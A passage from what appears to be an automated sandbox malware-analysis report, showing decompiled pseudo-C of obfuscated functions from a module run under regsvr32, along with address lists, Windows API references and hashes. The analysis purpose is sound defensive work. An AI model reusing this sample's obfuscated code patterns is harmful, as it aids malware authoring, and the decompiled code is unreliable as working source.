						HeapDestroy();
					}
				} else {
					if(__edx == 1) {
						_t5 = E00734DB4(_t15, __rcx, __rdi, _t22, __r9, __r10, __r11); // executed
						if(_t5 != 0) {
							_t6 = 0;
						}
					}
				}
				return _t6;
			}










                                0x0073695e
                                0x00736965
                                0x0073697d
                                0x0073698c
                                0x00736992
                                0x00736992
                                0x00736967
                                0x00736969
                                0x0073696e
                                0x00736975
                                0x00736977
                                0x00736977
                                0x00736975
                                0x00736969
                                0x0073699f

                                APIs
                                • HeapDestroy.KERNEL32 ref: 00736992
                                  • Part of subcall function 00734DB4: HeapCreate.KERNEL32 ref: 00734DE3
                                  • Part of subcall function 00734DB4: HeapAlloc.KERNEL32 ref: 00734E3D
                                  • Part of subcall function 00734DB4: HeapDestroy.KERNEL32 ref: 00734EA0
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: d0371551162c85bebb5106e4143b5f915806d9d0b9784eeaf08983102827102e
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: 82E0CD54711280A1FF385B62D6D533903659B84744F58D87D8D4A46307EE3CFD85D310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EAE80 Relevance: 1.5, APIs: 1, Instructions: 246COMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E00007FFC7FFC130EAE80(void* __rax, long long __rbx, signed long long __rcx, long long __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r14;
				void* __r15;
				signed int _t154;
				signed int _t155;
				signed int _t160;
				signed int _t168;
				void* _t171;
				signed int _t180;
				signed int _t184;
				signed int _t185;
				long long _t198;
				long long _t202;
				signed long long _t204;
				signed int* _t205;
				intOrPtr _t208;
				signed int _t211;
				signed int _t225;
				struct _CRITICAL_SECTION* _t238;
				intOrPtr _t240;
				signed int _t250;
				signed int _t259;
				signed long long _t262;
				void* _t264;
				void* _t265;
				void* _t275;
				void* _t279;
				void* _t281;
				signed int _t282;
				signed int _t283;
				signed long long _t284;
				void* _t286;
				void* _t288;

				_t275 = __r10;
				_t267 = __r8;
				_t207 = __rcx;
				_t198 = __rbx;
				 *((long long*)(_t264 + 0x18)) = __rbx;
				_t265 = _t264 - 0x90;
				r8d =  *(_t265 + 0x120);
				r14d = __rdx + 0x566;
				_t180 =  *(_t265 + 0x118);
				r11d =  *(_t265 + 0xf8);
				_t7 = _t207 - 0xde7; // 0x27ae
				_t250 = _t7;
				r11d = r11d + 0x1669;
				 *(_t265 + 0xd0) = r14d;
				r10d = __r8 - 0x1137;
				 *((long long*)(_t265 + 0xe8)) = __rdx;
				_t259 = _t180 + 0x61f;
				 *(_t265 + 0x7c) = r10d;
				r12d = _t180 - 0x1408;
				 *(_t265 + 0x70) = _t259;
				 *(_t265 + 0xd8) = r12d;
				 *(_t265 + 0x74) = _t180;
				r9d = __r8 - 0x4af;
				 *((long long*)(_t265 + 0x80)) = __rbx;
				 *(_t265 + 0x118) =  *(_t265 + 0x108) + 0xffffe9cc;
				_t184 =  *(_t265 + 0x110) + 0xffffdefd;
				 *(_t265 + 0x78) = r9d;
				 *(_t265 + 0x120) = _t184;
				 *(_t265 + 0x110) = r11d;
				 *(_t265 + 0x108) = _t250;
				if (__rdx - _t184 > 0) goto 0x130eb204;
				_t282 =  *((intOrPtr*)(_t265 + 0x128));
				r15d = __r11 - 0x15b;
				 *(_t265 + 0x38) = r15d;
				 *(_t265 + 0x30) = _t184;
				r14d = __rdx + 0x3666;
				 *(_t265 + 0x28) = __rcx;
				_t168 = __r9 + 0x15b;
				 *(_t265 + 0x20) = r15d;
				E00007FFC7FFC130E8BF0(r14d, _t168, _t184, __rbx, __rcx, __rdx, __r8, _t282, __r11, _t288, _t286, _t281, _t279);
				_t208 =  *((intOrPtr*)(_t265 + 0xe8));
				_t40 = _t250 + 0x1033; // 0x37e1
				r10d = _t40;
				_t225 =  *(_t265 + 0x74);
				r11d = _t279 + 0x25a;
				 *(_t265 + 0x50) = r10d;
				 *(_t265 + 0x48) = _t282;
				 *(_t265 + 0x40) = r11d;
				 *(_t265 + 0x38) = _t198 + 0x7bc;
				r9d = _t225 + 0x10a3;
				 *(_t265 + 0x30) = _t208 + 0x37e1;
				r8d = _t208 + 0x3a59;
				 *(_t265 + 0x28) = _t225 + 0x77c;
				_t54 = _t184 - 0x9d7; // -2519
				 *(_t265 + 0x20) = _t259 + 0xffffe5d9;
				 *(_t265 + 0x120) = _t184;
				_t154 = E00007FFC7FFC130FCDF0(_t168, _t184, _t198 + 0x7bc, _t54,  *(_t265 + 0x110) + 0x4c4, __r8, __r11, _t286);
				r12d = r12d + 0x18b7;
				r9d =  *(_t265 + 0x78);
				r10d =  *(_t265 + 0x70);
				r9d = r9d + 0xffffebf8;
				r10d = r10d + 0xffffed59;
				r8d =  *(_t265 + 0x108);
				_t240 =  *((intOrPtr*)(_t265 + 0xe8));
				r8d = r8d + 0x927;
				 *(_t265 + 0x50) = r14d;
				 *(_t265 + 0x48) = _t184;
				r13d = _t154;
				 *(_t265 + 0x40) =  *(_t265 + 0x120) + 0xfffff40f;
				 *(_t265 + 0x38) = r9d;
				r11d = _t240 + 0x2598;
				 *(_t265 + 0x30) = r10d;
				r9d = r12d;
				 *(_t265 + 0x28) = r11d;
				 *(_t265 + 0x20) =  *(_t265 + 0xd0) + 0x10ce;
				_t202 =  *((intOrPtr*)(_t265 + 0x128));
				_t155 = E00007FFC7FFC130E2A70(_t202, _t54, _t202, __r8, _t275); // executed
				r11d = _t240 + 0x27ae;
				_t75 = _t282 + 0xea7; // 0xea7
				r10d = _t75;
				r14d =  *(_t265 + 0xd0);
				r15d = _t155;
				r9d =  *(_t265 + 0x120);
				_t78 = _t184 + 0x1669; // 0x1669
				 *((long long*)(_t202 + 0x158)) =  *((intOrPtr*)(_t202 + 0x23c));
				_t80 = _t184 + 0x19bd; // 0x19bd
				r8d = _t80;
				_t185 =  *(_t265 + 0xd8);
				_t82 = _t282 + 0xd93; // 0xd93
				_t262 =  *((intOrPtr*)(_t265 + 0x80)) + 0xffffed95;
				_t204 =  *(_t265 + 0x118) + 0x77c;
				 *((long long*)(_t265 + 0x68)) = _t78;
				r14d = r14d + 0x14c1;
				r9d = r9d + 0x2b1;
				 *(_t265 + 0x60) = r12d;
				 *(_t265 + 0x58) = r8d;
				r8d = r13d;
				_t283 =  *((intOrPtr*)(_t265 + 0x128));
				 *(_t265 + 0x50) = r10d;
				 *(_t265 + 0x48) = r11d;
				 *(_t265 + 0x40) = _t204;
				 *(_t265 + 0x38) = _t185 + 0x1a27;
				 *(_t265 + 0x30) = _t185 + 0x126b;
				 *(_t265 + 0x28) = _t262;
				 *(_t265 + 0x20) = r14d;
				E00007FFC7FFC130E32C0(_t204,  *((intOrPtr*)(_t202 + 0x23c)), _t283, _t262, _t267, _t288);
				_t211 =  *(_t265 + 0x7c);
				r11d =  *(_t265 + 0xd8);
				r9d =  *(_t265 + 0x120);
				r11d = r11d + 0x16b5;
				r10d = _t211 - 0x886;
				 *(_t265 + 0x48) =  *(_t265 + 0x118) + 0xd1;
				r8d = _t211 - 0x6af;
				 *(_t265 + 0x40) = r10d;
				 *(_t265 + 0x38) = r11d;
				 *(_t265 + 0x30) = _t283;
				r9d = r9d + 0x8d0;
				 *(_t265 + 0x28) = _t204;
				 *(_t265 + 0x20) =  *(_t265 + 0x108) + 0x113b;
				E00007FFC7FFC130FD230(_t168,  *(_t265 + 0x118) + 0xd1, _t204, _t211 + 0xeb4, _t211 + 0x12a7);
				goto 0x130eb37e;
				_t205 =  *((intOrPtr*)(_t265 + 0x128));
				if (_t205[0x24] - (_t262 & 0x000036e7) >= 0) goto 0x130eb306;
				_t284 = r14d;
				if (_t205[0x62] - (_t205[0x50] - 0x23f6) * _t284 <= 0) goto 0x130eb306;
				r15d = _t168;
				r12d = r11d;
				r12d = r12d *  *(_t265 + 0x120);
				r15d = r15d ^ r14d;
				r14d =  *(_t265 + 0x118);
				r8d = r12d;
				r9d = _t205[0x48];
				r9d = r9d & 0x00003595;
				r9d = r9d + _t205[0x50];
				 *(_t265 + 0x38) = _t205[0x70];
				 *(_t265 + 0x30) = (_t205[0x36] | _t262) + _t205[0x62];
				 *(_t265 + 0x28) = _t205;
				 *(_t265 + 0x20) = r15d;
				E00007FFC7FFC131009D0(_t82, (_t168 & r14d) * r9d, _t205, _t205[0x62] ^  *_t205, (_t185 + 0x0000126b |  *(_t265 + 0x74)) & 0x00003666, _t205[0x62], (_t185 + 0x0000126b |  *(_t265 + 0x74)) & 0x00003666, _t262, _t267, _t282, __r11, _t279, _t286, _t288);
				r9d =  *(_t265 + 0x78);
				if (_t171 - (_t205[0x50] - 0x23f6) * _t284 > 0) goto 0x130eb270;
				r14d =  *(_t265 + 0xd0);
				r12d =  *(_t265 + 0xd8);
				r10d =  *(_t265 + 0x7c);
				r11d =  *(_t265 + 0x110);
				r12d = r12d & r10d;
				if (r14d - r12d > 0) goto 0x130eb378;
				 *(_t265 + 0x28) = _t205[0x2c] * _t205[0x12];
				 *_t205 =  *_t205 | _t205[0x62] - r14d;
				_t160 = __r11 - 0x23f6;
				 *(_t265 + 0x20) = _t160;
				InitializeCriticalSection(_t238);
				return _t160;
			}







































                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae90
                                0x7ffc130eae97
                                0x7ffc130eae9f
                                0x7ffc130eaea6
                                0x7ffc130eaeb4
                                0x7ffc130eaebc
                                0x7ffc130eaebc
                                0x7ffc130eaec2
                                0x7ffc130eaec9
                                0x7ffc130eaed1
                                0x7ffc130eaed8
                                0x7ffc130eaedf
                                0x7ffc130eaee5
                                0x7ffc130eaeea
                                0x7ffc130eaef1
                                0x7ffc130eaefc
                                0x7ffc130eaf04
                                0x7ffc130eaf16
                                0x7ffc130eaf22
                                0x7ffc130eaf29
                                0x7ffc130eaf37
                                0x7ffc130eaf3c
                                0x7ffc130eaf41
                                0x7ffc130eaf50
                                0x7ffc130eaf58
                                0x7ffc130eaf61
                                0x7ffc130eaf67
                                0x7ffc130eaf76
                                0x7ffc130eaf84
                                0x7ffc130eaf89
                                0x7ffc130eaf8d
                                0x7ffc130eaf94
                                0x7ffc130eaf98
                                0x7ffc130eafa2
                                0x7ffc130eafaa
                                0x7ffc130eafaf
                                0x7ffc130eafb6
                                0x7ffc130eafb6
                                0x7ffc130eafbd
                                0x7ffc130eafc1
                                0x7ffc130eafc9
                                0x7ffc130eafd4
                                0x7ffc130eafdf
                                0x7ffc130eaff0
                                0x7ffc130eaff4
                                0x7ffc130eaffb
                                0x7ffc130eb006
                                0x7ffc130eb013
                                0x7ffc130eb017
                                0x7ffc130eb01d
                                0x7ffc130eb021
                                0x7ffc130eb028
                                0x7ffc130eb034
                                0x7ffc130eb03b
                                0x7ffc130eb046
                                0x7ffc130eb04b
                                0x7ffc130eb059
                                0x7ffc130eb060
                                0x7ffc130eb06e
                                0x7ffc130eb075
                                0x7ffc130eb07c
                                0x7ffc130eb084
                                0x7ffc130eb088
                                0x7ffc130eb08b
                                0x7ffc130eb08f
                                0x7ffc130eb094
                                0x7ffc130eb09b
                                0x7ffc130eb0a0
                                0x7ffc130eb0a3
                                0x7ffc130eb0a8
                                0x7ffc130eb0ac
                                0x7ffc130eb0b7
                                0x7ffc130eb0c3
                                0x7ffc130eb0d1
                                0x7ffc130eb0d1
                                0x7ffc130eb0d8
                                0x7ffc130eb0e0
                                0x7ffc130eb0e3
                                0x7ffc130eb0eb
                                0x7ffc130eb0f1
                                0x7ffc130eb0f8
                                0x7ffc130eb0f8
                                0x7ffc130eb0ff
                                0x7ffc130eb106
                                0x7ffc130eb114
                                0x7ffc130eb11a
                                0x7ffc130eb120
                                0x7ffc130eb124
                                0x7ffc130eb131
                                0x7ffc130eb13e
                                0x7ffc130eb143
                                0x7ffc130eb148
                                0x7ffc130eb14b
                                0x7ffc130eb153
                                0x7ffc130eb15b
                                0x7ffc130eb160
                                0x7ffc130eb164
                                0x7ffc130eb168
                                0x7ffc130eb16c
                                0x7ffc130eb170
                                0x7ffc130eb175
                                0x7ffc130eb17a
                                0x7ffc130eb18c
                                0x7ffc130eb199
                                0x7ffc130eb1a1
                                0x7ffc130eb1af
                                0x7ffc130eb1b6
                                0x7ffc130eb1ba
                                0x7ffc130eb1c1
                                0x7ffc130eb1cc
                                0x7ffc130eb1d7
                                0x7ffc130eb1dc
                                0x7ffc130eb1e3
                                0x7ffc130eb1ed
                                0x7ffc130eb1f1
                                0x7ffc130eb1ff
                                0x7ffc130eb204
                                0x7ffc130eb21e
                                0x7ffc130eb239
                                0x7ffc130eb243
                                0x7ffc130eb249
                                0x7ffc130eb24c
                                0x7ffc130eb24f
                                0x7ffc130eb258
                                0x7ffc130eb25b
                                0x7ffc130eb276
                                0x7ffc130eb28e
                                0x7ffc130eb299
                                0x7ffc130eb2a0
                                0x7ffc130eb2a7
                                0x7ffc130eb2ad
                                0x7ffc130eb2b1
                                0x7ffc130eb2b6
                                0x7ffc130eb2bb
                                0x7ffc130eb2ca
                                0x7ffc130eb2e0
                                0x7ffc130eb2e2
                                0x7ffc130eb2ea
                                0x7ffc130eb2f9
                                0x7ffc130eb2fe
                                0x7ffc130eb306
                                0x7ffc130eb30c
                                0x7ffc130eb352
                                0x7ffc130eb356
                                0x7ffc130eb359
                                0x7ffc130eb36d
                                0x7ffc130eb372
                                0x7ffc130eb398

                                APIs
                                • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00007FFC130EB372
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection
                                • String ID:
                                • API String ID: 32694325-0
                                • Opcode ID: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction ID: d13d3fd60ab15f69874901ae012e89e4313c13ae80d127c0e99757a7c7504c2c
                                • Opcode Fuzzy Hash: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction Fuzzy Hash: 1CD17D736086C48BC325CF14E440BDEBBA4F788798F144126EB8967B58DB38EA55CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EA4F0 Relevance: 1.5, APIs: 1, Instructions: 208COMMON
                                Download Yara Rule
                                C-Code - Quality: 42%
                                			E00007FFC7FFC130EA4F0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __r12;
				void* __r13;
				void* __r14;
				short _t135;
				signed int _t142;
				void* _t147;
				signed int _t163;
				signed int _t174;
				long long _t176;
				signed int _t177;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed long long _t182;
				signed int _t195;
				long long _t196;
				long long _t201;
				void* _t221;
				long long _t223;
				long long _t228;
				long long _t232;
				void* _t234;
				void* _t241;
				void* _t242;
				void* _t245;
				struct _CRITICAL_SECTION* _t247;
				void* _t249;
				void* _t251;
				long long _t252;
				signed int* _t253;
				void* _t255;

				_t245 = __r9;
				 *((long long*)(_t241 + 0x10)) = __rbx;
				 *((long long*)(_t241 + 0x18)) = _t232;
				 *((long long*)(_t241 + 0x20)) = __rsi;
				_push(_t221);
				_t242 = _t241 - 0x90;
				r13d =  *(_t242 + 0x110);
				r11d = __rcx + 0x7bc;
				r14d =  *(_t242 + 0x120);
				r8d =  *(_t242 + 0xe0);
				r9d = _t249 + 0x1137;
				r15d = _t249 - 0x21a;
				r12d =  *(_t242 + 0xf8);
				_t174 =  *(_t242 + 0xe8) + 0x40c;
				 *(_t242 + 0x80) = r15d;
				 *(_t242 + 0x120) = _t174;
				r10d = _t249 + 0xf35;
				 *(_t242 + 0x110) = r10d;
				_t234 =  *((intOrPtr*)(_t242 + 0xf0)) + 0xffffcf2b;
				 *(_t242 + 0xc0) = r11d;
				r12d = r12d + 0xffffefef;
				if (__rcx - _t174 < 0) goto 0x130ea883;
				if (r12d - __r9 - 0x17e6 <= 0) goto 0x130ea789;
				_t176 = __rdx + 0x2103;
				 *((long long*)(_t242 + 0x60)) = _t176;
				r10d = _t221 + 0x38e9;
				_t252 =  *((intOrPtr*)(_t242 + 0x108));
				 *((long long*)(_t242 + 0x58)) = _t252;
				r11d = _t255 + 0x114f;
				 *(_t242 + 0x50) = r10d;
				r9d = __r8 - 0xde7;
				 *(_t242 + 0x48) = r11d;
				r8d = __rdx + 0x343a;
				 *(_t242 + 0x40) = _t234 + 0x37e1;
				 *(_t242 + 0x38) = _t221 + 0x27b2;
				 *(_t242 + 0x30) = _t234 + 0x2103;
				 *((long long*)(_t242 + 0x28)) = __rcx + 0x2b1;
				 *(_t242 + 0x20) = r13d;
				E00007FFC7FFC130E11F0(__rcx,  *((intOrPtr*)(_t242 + 0xf0)), _t234 + 0x2103, __rcx + 0x2b1, __r8, _t247, _t249, _t252); // executed
				_t218 = _t176;
				r9d =  *(_t242 + 0x110);
				r9d = r9d + 0xffffeeb1;
				 *((long long*)(_t252 + 0x158)) =  *((intOrPtr*)(_t252 + 0x350));
				_t49 = _t176 - 0x814; // -2068
				_t51 = _t176 - 0x108; // -264
				r10d = _t51;
				_t177 =  *(_t242 + 0x120);
				_t53 = _t218 - 0x113b; // -4411
				_t228 = _t53;
				 *(_t242 + 0x78) = r10d;
				_t55 = _t218 - 0x4af; // -1199
				r8d = _t55;
				_t201 =  *((intOrPtr*)(_t252 + 0xe0)) + 0x3595;
				 *((long long*)(_t252 + 0x58)) = _t201;
				r14d =  *(_t242 + 0xc0);
				_t147 = _t249 + 0x1137;
				r13d =  *(_t242 + 0xe8);
				r11d = _t201 - 0x202;
				 *(_t242 + 0x70) = r11d;
				_t223 = _t177 - 0x1563;
				 *((long long*)(_t242 + 0x68)) = _t49;
				r15d = _t201 - 0x113b;
				_t195 =  *((intOrPtr*)(_t242 + 0x108));
				r12d = _t201 - 0x760;
				 *((long long*)(_t242 + 0x60)) = _t223;
				 *((long long*)(_t242 + 0x58)) = _t228;
				r14d = r14d + 0xffffe5d9;
				 *(_t242 + 0x50) =  *(_t242 + 0xe0) + 0x24c;
				r13d = r13d + 0x2b1;
				 *(_t242 + 0x48) = r14d;
				 *(_t242 + 0x40) = r15d;
				 *(_t242 + 0x38) = _t195;
				 *(_t242 + 0x30) = r12d;
				 *((long long*)(_t242 + 0x28)) = _t177 + 0xfffff21d;
				 *(_t242 + 0x20) = r13d;
				_t135 = E00007FFC7FFC130FE7E0(_t201 + 0xffffe749, _t176 + 0xfffff8a0, __r8, _t245, _t255, _t251, _t249); // executed
				r15d =  *(_t242 + 0x80);
				 *((short*)(_t195 + 0xf8)) = _t135;
				_t180 =  *((intOrPtr*)(_t195 + 0xd0)) + 0x108;
				 *((long long*)(_t195 + 0x108)) = _t180;
				 *_t180 =  *_t180 + _t180;
				 *((intOrPtr*)(_t180 + 0x2b)) =  *((intOrPtr*)(_t180 + 0x2b)) + _t147;
				 *_t180 = _t135;
				 *_t180 =  *_t180 + _t180;
				 *((intOrPtr*)(_t180 + 1)) =  *((intOrPtr*)(_t180 + 1)) + _t147;
				_t181 =  *_t180;
				 *_t181 =  *_t181 + _t181;
				bpl = 1;
				 *_t181 =  *_t181 + _t135;
				_t196 =  *((intOrPtr*)(_t242 + 0x108));
				_t182 = r15d;
				if (_t182 - ( *(_t196 + 0x188) |  *(_t196 + 0xb8)) < 0) goto 0x130ea93e;
				r14d = 0x228c;
				r10d = r10d ^ 0x000038e9;
				 *(_t242 + 0x110) = r10d;
				asm("o16 nop [eax+eax]");
				r8d = r10d;
				r8d = r8d *  *(_t196 + 0x120);
				 *(_t242 + 0x20) = _t163 * r9d;
				r9d = _t147 + bpl & 0x0000ffff;
				r9d = r9d * (r11w & 0xffffffff);
				EnterCriticalSection(_t247);
				r8d =  *(_t242 + 0xe0);
				r10d =  *(_t242 + 0x110);
				r11d =  *(_t242 + 0xc0);
				 *(_t196 + 0xe0) =  *(_t196 + 0xe0) | _t249 + 0x00000eb4 ^  *(_t196 + 0x1f8) ^  *(_t196 + 0x1c0);
				if (r15d - ( *(_t196 + 0x188) |  *(_t196 + 0xb8)) >= 0) goto 0x130ea7d0;
				goto 0x130ea93e;
				_t253 =  *((intOrPtr*)(_t242 + 0x108));
				if (r15d - _t253[0x38] * _t253[0x18] * _t142 <= 0) goto 0x130ea93e;
				r11d = _t253[0x48];
				r11d = r11d | r8d;
				r10d = _t253[0x1e];
				r9d =  *_t253;
				r10d = r10d + _t253[6];
				r9d = r9d - (_t249 - 0x000027b2 ^  *(_t196 + 0x130) ^  *(_t196 + 0xa8));
				r8d =  *(_t242 + 0xc0);
				r10d = r10d | 0x00003666;
				 *(_t242 + 0x48) = _t223 + 1;
				 *(_t242 + 0x40) = _t228 - _t182 -  *((intOrPtr*)(_t196 + 0x110)) | 0x00003666;
				 *(_t242 + 0x38) = r11d;
				r12d = r12d * (__r8 - 0x40c);
				 *(_t242 + 0x30) = _t253;
				 *((long long*)(_t242 + 0x28)) = _t196;
				 *(_t242 + 0x20) = r10d;
				r8d = r8d + r12d;
				E00007FFC7FFC130FD230((_t249 - 0x000027b2 ^  *(_t196 + 0x130) ^  *(_t196 + 0xa8)) -  *_t253 ^ _t253[0x62], r15d, _t196, _t163 * r9d ^ 0x000027b2,  *(_t196 + 0x1d0) & 0x0000ffff);
				return _t255 + 0x216;
			}

































                                0x7ffc130ea4f0
                                0x7ffc130ea4f0
                                0x7ffc130ea4f5
                                0x7ffc130ea4fa
                                0x7ffc130ea4ff
                                0x7ffc130ea508
                                0x7ffc130ea50f
                                0x7ffc130ea517
                                0x7ffc130ea51e
                                0x7ffc130ea526
                                0x7ffc130ea53c
                                0x7ffc130ea54a
                                0x7ffc130ea551
                                0x7ffc130ea560
                                0x7ffc130ea565
                                0x7ffc130ea56d
                                0x7ffc130ea574
                                0x7ffc130ea582
                                0x7ffc130ea58a
                                0x7ffc130ea590
                                0x7ffc130ea5a5
                                0x7ffc130ea5bc
                                0x7ffc130ea5cb
                                0x7ffc130ea5d1
                                0x7ffc130ea5d7
                                0x7ffc130ea5db
                                0x7ffc130ea601
                                0x7ffc130ea609
                                0x7ffc130ea60e
                                0x7ffc130ea615
                                0x7ffc130ea61a
                                0x7ffc130ea621
                                0x7ffc130ea626
                                0x7ffc130ea634
                                0x7ffc130ea638
                                0x7ffc130ea63c
                                0x7ffc130ea640
                                0x7ffc130ea644
                                0x7ffc130ea649
                                0x7ffc130ea655
                                0x7ffc130ea657
                                0x7ffc130ea666
                                0x7ffc130ea66d
                                0x7ffc130ea674
                                0x7ffc130ea681
                                0x7ffc130ea681
                                0x7ffc130ea688
                                0x7ffc130ea68f
                                0x7ffc130ea68f
                                0x7ffc130ea695
                                0x7ffc130ea69a
                                0x7ffc130ea69a
                                0x7ffc130ea6a1
                                0x7ffc130ea6ae
                                0x7ffc130ea6b8
                                0x7ffc130ea6c0
                                0x7ffc130ea6c7
                                0x7ffc130ea6cf
                                0x7ffc130ea6d6
                                0x7ffc130ea6db
                                0x7ffc130ea6e1
                                0x7ffc130ea6e5
                                0x7ffc130ea6ec
                                0x7ffc130ea6f4
                                0x7ffc130ea6fb
                                0x7ffc130ea704
                                0x7ffc130ea708
                                0x7ffc130ea70f
                                0x7ffc130ea713
                                0x7ffc130ea71a
                                0x7ffc130ea725
                                0x7ffc130ea72a
                                0x7ffc130ea72f
                                0x7ffc130ea734
                                0x7ffc130ea738
                                0x7ffc130ea73d
                                0x7ffc130ea749
                                0x7ffc130ea755
                                0x7ffc130ea75c
                                0x7ffc130ea763
                                0x7ffc130ea773
                                0x7ffc130ea775
                                0x7ffc130ea778
                                0x7ffc130ea77a
                                0x7ffc130ea77c
                                0x7ffc130ea77f
                                0x7ffc130ea781
                                0x7ffc130ea785
                                0x7ffc130ea787
                                0x7ffc130ea789
                                0x7ffc130ea794
                                0x7ffc130ea7a8
                                0x7ffc130ea7b2
                                0x7ffc130ea7b8
                                0x7ffc130ea7bf
                                0x7ffc130ea7ca
                                0x7ffc130ea7f0
                                0x7ffc130ea7f3
                                0x7ffc130ea802
                                0x7ffc130ea807
                                0x7ffc130ea816
                                0x7ffc130ea81e
                                0x7ffc130ea824
                                0x7ffc130ea837
                                0x7ffc130ea842
                                0x7ffc130ea85d
                                0x7ffc130ea878
                                0x7ffc130ea87e
                                0x7ffc130ea883
                                0x7ffc130ea8a4
                                0x7ffc130ea8c6
                                0x7ffc130ea8da
                                0x7ffc130ea8e4
                                0x7ffc130ea8eb
                                0x7ffc130ea8ee
                                0x7ffc130ea8f2
                                0x7ffc130ea8f5
                                0x7ffc130ea8fd
                                0x7ffc130ea915
                                0x7ffc130ea919
                                0x7ffc130ea91d
                                0x7ffc130ea922
                                0x7ffc130ea928
                                0x7ffc130ea92d
                                0x7ffc130ea931
                                0x7ffc130ea936
                                0x7ffc130ea939
                                0x7ffc130ea965

                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFC130EA81E
                                  • Part of subcall function 00007FFC130E11F0: GetProcessHeap.KERNEL32 ref: 00007FFC130E1490
                                  • Part of subcall function 00007FFC130E11F0: RtlReleasePrivilege.NTDLL ref: 00007FFC130E14A3
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalEnterHeapPrivilegeProcessReleaseSection
                                • String ID:
                                • API String ID: 3441125642-0
                                • Opcode ID: 1b63504a4b40dae1c56da389596a0931d0353b063fbcd4a8ca78c4ed5e3cd33d
                                • Instruction ID: 78221295fa8c2ba37ba84bb2e190045f8c22a7c505b6ff4ee90f700e3c5fed37
                                • Opcode Fuzzy Hash: 1b63504a4b40dae1c56da389596a0931d0353b063fbcd4a8ca78c4ed5e3cd33d
                                • Instruction Fuzzy Hash: 76B179732086D58AD721CF15E444BEEB7A8F788B48F414125EB8A17B58DB78EA95CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F9610 Relevance: 1.4, APIs: 1, Instructions: 138COMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E00007FFC7FFC130F9610(void* __rax, long long __rbx, signed int __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, long long _a16, long long _a32, signed int _a40, signed int _a64, signed int* _a72, signed int _a80, long long _a96) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				signed int _v64;
				signed int _v72;
				signed long long _v80;
				signed int _v88;
				signed int* _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				signed int _v128;
				signed int _v136;
				void* __rsi;
				void* __rbp;
				signed int _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				long long _t98;
				signed int* _t110;
				signed int _t136;

				_t98 = _a96;
				_t87 = __r9 - 0xefd;
				r8d = _a80;
				r8d = r8d + 0xaeb;
				_t136 = _a64 + 0xffffeb3f;
				_a16 = __rdx - 0x3189;
				r10d = _t98 - 0xbf1;
				_a64 = _t136;
				_a80 = r10d;
				_a96 = _t98 + 0x8d0;
				_a32 = _t98;
				_a40 = __rcx;
				if (__rcx == _t98) goto 0x130f98d3;
				_t85 = __r10 + 0x114f;
				_a8 = __rbx;
				_t110 = _a72;
				if (_t136 - _t98 >= 0) goto 0x130f9723;
